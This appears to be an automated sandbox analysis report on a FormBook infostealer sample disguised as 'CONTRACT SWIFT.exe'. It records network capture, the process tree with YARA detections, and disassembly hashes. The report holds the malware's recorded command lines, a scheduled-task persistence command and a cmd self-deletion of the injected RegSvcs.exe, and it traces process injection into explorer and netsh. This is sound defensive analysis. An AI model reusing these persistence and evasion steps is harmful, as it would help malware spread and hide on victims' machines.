May 31, 2021 21:48:05.657217026 CEST	6458	IN	Data Raw: 61 64 69 75 73 3a 20 31 32 70 78 7d 0d 0a 2e 6b 77 64 5f 62 6c 6f 61 63 6b 20 75 6c 20 6c 69 20 61 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 62 38 30 34 30 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 7d 0d 0a 0d 0a 2e Data Ascii: adius: 12px}.kwd_bloack ul li a:hover{background-color:#0b8040;color: #fff}.sale-msg {background:#fff; color:#4b4b4b; text-align:center; font-size:14px; height:40px; width:100%; top:0; left:0}.sale-msg a {text-decoration: none; color:#
May 31, 2021 21:48:05.657247066 CEST	6460	IN	Data Raw: 70 3a 20 75 6e 73 65 74 3b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 6e 6f 6e 65 3b 7d 0d 0a 20 20 20 20 2e 6d 73 67 72 69 67 68 74 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 7d 0d 0a 20 20 20 20 2e 74 Data Ascii: p: unset; transform: none;} .msgright{width: 100%;text-align: center} .top-strip{margin-bottom: 40px} .logo-img-wrap{float:none;width:auto} .searchbox{margin:0; float:none; width:auto; padding:20px 5px} .kwd_bloack{f
May 31, 2021 21:48:05.657305956 CEST	6461	IN	Data Raw: 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 7d 0d 0a 20 20 20 20 2e 6d 73 67 72 69 67 68 74 20 2e 65 78 70 4d 73 67 2c 20 2e 62 61 63 6b 6f 72 64 65 72 2c 20 2e 6d 73 67 72 69 67 68 74 20 2e 65 78 70 4d 73 67 20 61 7b 66 6f 6e 74 2d 73 69 7a Data Ascii: {font-size: 12px} .msgright .expMsg, .backorder, .msgright .expMsg a{font-size: 12px} .related-searches-custom{font-size: 14px} }</style><script language="JavaScript" type="text/javascript" src="http://i4.cdn-image.com/__media
May 31, 2021 21:48:05.657402992 CEST	6462	IN	Data Raw: 64 3d 72 6e 72 73 61 6e 73 2e 63 6f 6d 22 20 6f 6e 43 6c 69 63 6b 3d 22 72 65 74 75 72 6e 20 70 6f 70 75 70 28 74 68 69 73 2c 20 27 6e 6f 74 65 73 27 29 22 3e 20 57 68 79 20 61 6d 20 49 20 73 65 65 69 6e 67 20 74 68 69 73 20 27 55 6e 64 65 72 20 Data Ascii: d=rnrsans.com" onClick="return popup(this, 'notes')"> Why am I seeing this 'Under Construction' page?</a></p> <div class="expMsg"> </div> </div> </div> </div>
May 31, 2021 21:48:05.657473087 CEST	6464	IN	Data Raw: 4c 6f 73 73 22 20 69 64 3d 22 64 6b 31 22 20 6e 61 6d 65 3d 22 64 6b 31 22 20 3e 48 65 61 6c 74 68 79 20 57 65 69 67 68 74 20 4c 6f 73 73 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c Data Ascii: Loss" id="dk1" name="dk1" >Healthy Weight Loss</a></li> <li><a href="http://www.rnrsans.com/All_Inclusive_Vacation_Packages.cfm?fp=jeFOjF7S5%2Fw47R8mU26RbQJ97fTJVQ5%2BQpUGpNdIkfHtD8QVYJZQZOeTMcWTHqIVxs7QJ26uDHryQtzyxgC6yAt
May 31, 2021 21:48:05.775249958 CEST	6465	IN	Data Raw: 52 66 72 46 46 61 35 65 33 76 71 36 35 71 6d 34 6e 77 55 79 45 48 74 75 2b 41 4f 64 31 54 4d 51 6a 59 6b 4f 43 69 4e 45 66 52 43 77 25 33 44 25 33 44 26 37 6e 6f 3d 34 68 4c 6c 6a 72 57 50 43 6a 59 4c 26 26 6b 74 3d 31 31 32 26 26 6b 69 3d 32 38 Data Ascii: RfrFFa5e3vq65qm4nwUyEHtu+AOd1TMQjYkOCiNEfRCw%3D%3D&7no=4hLljrWPCjYL&&kt=112&&ki=28656260&ktd=0&kld=1042&kp=3" target="_top" onmouseover="changeStatus('Top Smart Phones');return true;" onmouseout="changeStatus('');return true;" onclick="if(type

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: CONTRACT SWIFT.exe PID: 6892 Parent PID: 5884

General

Start time:	21:46:02
Start date:	31/05/2021
Path:	C:\Users\user\Desktop\CONTRACT SWIFT.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\CONTRACT SWIFT.exe'
Imagebase:	0x470000
File size:	1051136 bytes
MD5 hash:	DB181EBDB6F9F062A64BD94AAF2040C0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.329773709.0000000003889000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.329773709.0000000003889000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.329773709.0000000003889000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 7068 Parent PID: 6892

General

Start time:	21:46:05
Start date:	31/05/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\hiCrWx' /XML 'C:\Users\user\AppData\Local\Temp\tmpF496.tmp'
Imagebase:	0xf10000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 7088 Parent PID: 7068

General

Start time:	21:46:06
Start date:	31/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RegSvcs.exe PID: 7136 Parent PID: 6892

General

Start time:	21:46:06
Start date:	31/05/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0xbc0000
File size:	45152 bytes
MD5 hash:	2867A3817C9245F7CF518524DFD18F28
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.390820597.0000000001570000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.390820597.0000000001570000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.390820597.0000000001570000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.390721671.0000000001130000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.390721671.0000000001130000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.390721671.0000000001130000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.325826408.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.325826408.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.325826408.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 3440 Parent PID: 7136

General

Start time:	21:46:08
Start date:	31/05/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6f22f0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: netsh.exe PID: 6376 Parent PID: 3440

General

Start time:	21:46:33
Start date:	31/05/2021
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\netsh.exe
Imagebase:	0x9e0000
File size:	82944 bytes
MD5 hash:	A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.584803050.0000000000A70000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.584803050.0000000000A70000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.584803050.0000000000A70000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6340 Parent PID: 6376

General

Start time:	21:46:38
Start date:	31/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6332 Parent PID: 6340

General

Start time:	21:46:38
Start date:	31/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: CONTRACT SWIFT.exe PID: 6892 Parent PID: 5884 CONTRACT SWIFT.exeCOMMON

Executed Functions

Function 0B4A6418, Relevance: 5.3, Strings: 4, Instructions: 334COMMON

Download Yara Rule

Strings

p`;a, xrefs: 0B4A646C
p`;a, xrefs: 0B4A6825
$<z;, xrefs: 0B4A6822
FFUy, xrefs: 0B4A6609

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID: $<z;$FFUy$p`;a$p`;a
API String ID: 0-505547124
Opcode ID: 53ace6c9fcbf828e4d95b401f74ac1af16a1970e1e5748393260ec4a671d2701
Instruction ID: 9755008fd76813ce848d6742a3b3a0c18a2bd574153ac18bf3a4f13e716c1f9d
Opcode Fuzzy Hash: 53ace6c9fcbf828e4d95b401f74ac1af16a1970e1e5748393260ec4a671d2701
Instruction Fuzzy Hash: BDD14974E06218DFDB04DFA5D9557DDFBB6FB88710F24902AE405BB394DB389A018B18

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A6408, Relevance: 5.3, Strings: 4, Instructions: 332COMMON

Download Yara Rule

Strings

p`;a, xrefs: 0B4A646C
p`;a, xrefs: 0B4A6825
$<z;, xrefs: 0B4A6822
FFUy, xrefs: 0B4A6609

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID: $<z;$FFUy$p`;a$p`;a
API String ID: 0-505547124
Opcode ID: 8661c553503b030582e89f85ad3a175cf538a5560b7aa941fac8d551c6356d17
Instruction ID: 7690211c8186292c7240f9bd023112cddad13187c65cdd399c9fadf52ad06e89
Opcode Fuzzy Hash: 8661c553503b030582e89f85ad3a175cf538a5560b7aa941fac8d551c6356d17
Instruction Fuzzy Hash: 85D13874E11219DFDB08DFA4D9557DDFBB6FB88710F24902AE405BB394DB389A018B18

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A9220, Relevance: 4.0, Strings: 3, Instructions: 219COMMON

Download Yara Rule

Strings

RAh, xrefs: 0B4A936A
RAh, xrefs: 0B4A9279
RAh, xrefs: 0B4A91C5

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID: RAh$RAh$RAh
API String ID: 0-1929556298
Opcode ID: 9a12112b76a0d0429182bc5d171c6bb17946a1f5efb2270120e9fc00b3bba1be
Instruction ID: b957b3b82c328d2f11c871050a1ab4d76ef48b5fd26e972f69a208d5b5b5e301
Opcode Fuzzy Hash: 9a12112b76a0d0429182bc5d171c6bb17946a1f5efb2270120e9fc00b3bba1be
Instruction Fuzzy Hash: 1E815C71D1A209DFCB14CFA5D5805EEFBB6FB99710F20942BE016AB254D7389A428F05

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A7C2A, Relevance: 2.6, Strings: 2, Instructions: 134COMMON

Download Yara Rule

Strings

(, xrefs: 0B4A7C2A
T%8 , xrefs: 0B4A79E4

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID: ($T%8
API String ID: 0-946089969
Opcode ID: 181e10871ff8475de7d8a7dece20d4d994e42bbbbf57541fa9ca2e653c715ab9
Instruction ID: f8ca6470ab9ae3eb897e42689017345f44066e0f9275702e17121a39ee51c3f2
Opcode Fuzzy Hash: 181e10871ff8475de7d8a7dece20d4d994e42bbbbf57541fa9ca2e653c715ab9
Instruction Fuzzy Hash: 6B512470E4062ACFDB24CF65C984BADB7B2BB99300F1085EAD11AB7250E7749B858F54

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A7968, Relevance: 1.4, Strings: 1, Instructions: 175COMMON

Download Yara Rule

Strings

T%8 , xrefs: 0B4A79E4

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID: T%8
API String ID: 0-2002542545
Opcode ID: 32070448208899cb118c8896e53119e5bc2d602460a0b83fe32e1e1a9e873cd6
Instruction ID: 260b6af5b0ebd6815093dc2087a970418b7fed016d5c1c27eef77537d5355afe
Opcode Fuzzy Hash: 32070448208899cb118c8896e53119e5bc2d602460a0b83fe32e1e1a9e873cd6
Instruction Fuzzy Hash: 1F715871E04629CBDB28CF66CC847ADB7B6FB99300F10C5AAD419B7250EB305A868F00

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A7957, Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

T%8 , xrefs: 0B4A79E4

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID: T%8
API String ID: 0-2002542545
Opcode ID: fedea42faa54c62ef8865d0f01de48a47a7ee98a4cd2ca630220070dfaf1cba7
Instruction ID: 8ac6bdfe9e529156cbbe4845df5de958c3ac7bddc4b91a82bcc2d915b4941f03
Opcode Fuzzy Hash: fedea42faa54c62ef8865d0f01de48a47a7ee98a4cd2ca630220070dfaf1cba7
Instruction Fuzzy Hash: A1714771E006298FDB28CF66CD8479DBBB2BF98300F14C5EAD519B7254EB705A868F14

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A7BD3, Relevance: 1.4, Strings: 1, Instructions: 146COMMON

Download Yara Rule

Strings

T%8 , xrefs: 0B4A79E4

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID: T%8
API String ID: 0-2002542545
Opcode ID: 5946c244da59aeed876645e3e970868bf967d7e64435e7c3c380c0ec7f7c7727
Instruction ID: 29a161c26bc4ed5beede3477763a444918e4368616b07f06c2d0c9db2c9f2f13
Opcode Fuzzy Hash: 5946c244da59aeed876645e3e970868bf967d7e64435e7c3c380c0ec7f7c7727
Instruction Fuzzy Hash: 61611370E0162ACFDB24CF65C984BEDB7B2BB99300F1085EAD11AB7240E7749B858F54

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A7B9F, Relevance: 1.4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

T%8 , xrefs: 0B4A79E4

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID: T%8
API String ID: 0-2002542545
Opcode ID: d00910409be8438cdfbf1565ca9ce01a67cad4d7d2662f10c0f61551bca649fe
Instruction ID: 88a0b7625b985f6ed08c6e85cfb4a0839694fec1c0e7ba9baf8b917ed8ab6717
Opcode Fuzzy Hash: d00910409be8438cdfbf1565ca9ce01a67cad4d7d2662f10c0f61551bca649fe
Instruction Fuzzy Hash: 2B510470E0062ACFDB24CF65CD84B9DB7B2FB99300F1085EAD51AB7250EB749A858F54

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A7B85, Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

T%8 , xrefs: 0B4A79E4

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID: T%8
API String ID: 0-2002542545
Opcode ID: b5ae2e1a8f61a2a6293ff90db9524803e10a5fdddd4fd6c98235fa5b695f42ae
Instruction ID: 97d453dffe3f0a0b04710b582ea6895e1393096ff6e4851aec95ee3903d9a910
Opcode Fuzzy Hash: b5ae2e1a8f61a2a6293ff90db9524803e10a5fdddd4fd6c98235fa5b695f42ae
Instruction Fuzzy Hash: B4513570E0062ACFDB24CF65C984BA9B7B2FB98300F1085EAD11AB7250E7709B858F54

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A7B93, Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

T%8 , xrefs: 0B4A79E4

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID: T%8
API String ID: 0-2002542545
Opcode ID: 667ece2cab1f8af095b9b8f2d906ec2a9c2a0c99867da726ad297e5e7d87cb51
Instruction ID: e8fb9ad610dde76d7f63b56c84f7f89a4af192ad100ef47532f395009efae327
Opcode Fuzzy Hash: 667ece2cab1f8af095b9b8f2d906ec2a9c2a0c99867da726ad297e5e7d87cb51
Instruction Fuzzy Hash: 1E512570E0062ACFDB24CF65C984BA9B7B2BB99300F1085EAD11AB7250E7749B858F54

Uniqueness

Uniqueness Score: -1.00%

Function 0B4AAA48, Relevance: .6, Instructions: 613COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e933c9362d7439b428c3dc688aa3e8c78c8532df6d61c26b49d0aaf020c6ccd0
Instruction ID: 12092bc178de4c3056fa2bcd4ada40f2b7bd4ab6f6d62b6cfe4a56c056f8edc1
Opcode Fuzzy Hash: e933c9362d7439b428c3dc688aa3e8c78c8532df6d61c26b49d0aaf020c6ccd0
Instruction Fuzzy Hash: 10327674B012049FEB29DB69C464BAEB7F7AF88704F14446AE146DB3A0DB35EE01CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0286B52C, Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.327276556.0000000002860000.00000040.00000001.sdmp, Offset: 02860000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 8773131fce9a1dd99a4f8b3b2648777cdac1fd1e7985e3f387a9acd151023895
Instruction ID: 65de4951c71dcf83b7f256704856defc826e598480bc0bd4594a16fe42706827
Opcode Fuzzy Hash: 8773131fce9a1dd99a4f8b3b2648777cdac1fd1e7985e3f387a9acd151023895
Instruction Fuzzy Hash: 3F917239E003198FCB04DFA4D8589EDB7BAFF89314F248619E415AB364EF34A945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0286E310, Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.327276556.0000000002860000.00000040.00000001.sdmp, Offset: 02860000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c7025bc19cd9a497140bf9aff89cd9d5713d172ac9efaafa2f32ac87ea214f3f
Instruction ID: c9fd6aee6ed19f21b7fc1407e1a07096a913ceccf16f48029612dd6dd0a09685
Opcode Fuzzy Hash: c7025bc19cd9a497140bf9aff89cd9d5713d172ac9efaafa2f32ac87ea214f3f
Instruction Fuzzy Hash: 52819339E003199FCB04DFA4D8589EDB7BAFF89314F248619E415AB364EF30A945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A6A88, Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d5bbaec44fdad00d8184874af6d88926764a98c4b4a429e2274c5be6b5df90f
Instruction ID: f65ecbf704790328cdc788df9729802bfebdcca066f99e357a162f662f7dea2e
Opcode Fuzzy Hash: 3d5bbaec44fdad00d8184874af6d88926764a98c4b4a429e2274c5be6b5df90f
Instruction Fuzzy Hash: 72810774E112199FCB08DFE5D9556AEFBB2FF89300F14942AD816AB354EB349A02CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A6A98, Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15764a8c218a83eccb4a636b4ebd8e1df6524696ffe5d4f93084ca00f88f8bf4
Instruction ID: 2cfc757597918d8c89e6f289dd16116d6d5bdbd0a37d74e47e2597b51766a2cb
Opcode Fuzzy Hash: 15764a8c218a83eccb4a636b4ebd8e1df6524696ffe5d4f93084ca00f88f8bf4
Instruction Fuzzy Hash: 50811574E112199FCB08DFE5D9556AEFBB2FF89300F14942AE816AB354DB349A02CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A5CE8, Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 112c7170a610f5d1056db58570f821ea7adb32f1ec085b925587247f22d821ed
Instruction ID: 5f61a34677fb6aa4635a0e81b8d146d3e94ed22e7a8f07cb766bdd2d038a8098
Opcode Fuzzy Hash: 112c7170a610f5d1056db58570f821ea7adb32f1ec085b925587247f22d821ed
Instruction Fuzzy Hash: 49517F75E15208DBCB48CFA5EA445DEFBF6FB9D310F14A426D405BB254DB3899018B28

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A5CD8, Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bdb290e42f74ed5370ea66ea2a82ec3950b70c83e1568eca231939ece977c99
Instruction ID: 132762fd9c6206594220e2f900baca96ee5b1b480799a59f7c6576c75cbb6a16
Opcode Fuzzy Hash: 7bdb290e42f74ed5370ea66ea2a82ec3950b70c83e1568eca231939ece977c99
Instruction Fuzzy Hash: 97518E75E152089FCB08CFA5EA455DEFBB2FF9D310F14A526D405BB254DB3899018B18

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A59B8, Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93ef4576f11415f6e335ef28ee75ec406a1bff441e29ea030e2cef63b19aba3f
Instruction ID: cd4099418f44baccf55e67149e78a71299d97e24e0e4d9c18bdcfa0b29809183
Opcode Fuzzy Hash: 93ef4576f11415f6e335ef28ee75ec406a1bff441e29ea030e2cef63b19aba3f
Instruction Fuzzy Hash: F1318F70E05218CBDB08CFA5E6845EEBBF6BB9D210F14E527D506BB354DB349A05CB28

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A59A9, Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c80af836740a4f90d48ed91d88dd0bd726c4b2a3bf5d42201a2f7351ce148cf0
Instruction ID: 2dc3a286b1d508586903eed35c628a553cb0ef8e225311393774effef3073b06
Opcode Fuzzy Hash: c80af836740a4f90d48ed91d88dd0bd726c4b2a3bf5d42201a2f7351ce148cf0
Instruction Fuzzy Hash: B9319E70E052188FCF08CFA5E6845DEBBF6BB9D200F14A527D506BB354EB349A01CB28

Uniqueness

Uniqueness Score: -1.00%

Function 0B4AA1D8, Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27c8f49c6cab0945f1197b128e603ae0ad4b66ff13075e27f7817687e781f1df
Instruction ID: 57d70dedb1586e90d13bc6a3e4c384d1d8d725c7a05cd396c5b26cf9da4e131b
Opcode Fuzzy Hash: 27c8f49c6cab0945f1197b128e603ae0ad4b66ff13075e27f7817687e781f1df
Instruction Fuzzy Hash: B7313471D46218DFDB00CFA5E468BEEBBB1BB1A300F10942AE411B3340D73A9A55CB26

Uniqueness

Uniqueness Score: -1.00%

Function 0B4AA1C8, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 683b0522d97ca57131db5ec3cb87317c9a93096d10e4307c7265fb746209009e
Instruction ID: 27dca8c8c382c3734e7c46a2baa07ffc84a11b9ec71d77c5f44d26616843d9f1
Opcode Fuzzy Hash: 683b0522d97ca57131db5ec3cb87317c9a93096d10e4307c7265fb746209009e
Instruction Fuzzy Hash: 64316871D46218DFDB00CFA4E468BEEBBB1BB1A310F50553AE411B3380D73A9A55CB16

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A4740, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0B4A4976

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1a9864a4fd6f434d7531d37e4e1ab14524af953f2d33ff0e03d97c7be5c60e38
Instruction ID: c0ba85f3e005563b7b7cee335b07b744396d0387629e6a3304ba29cfdb1c4825
Opcode Fuzzy Hash: 1a9864a4fd6f434d7531d37e4e1ab14524af953f2d33ff0e03d97c7be5c60e38
Instruction Fuzzy Hash: 15912A71D00259CFDF10CFA9D9807EEBAB2BF58314F14856AE819A7380DB749A85CF91

Uniqueness

Uniqueness Score: -1.00%

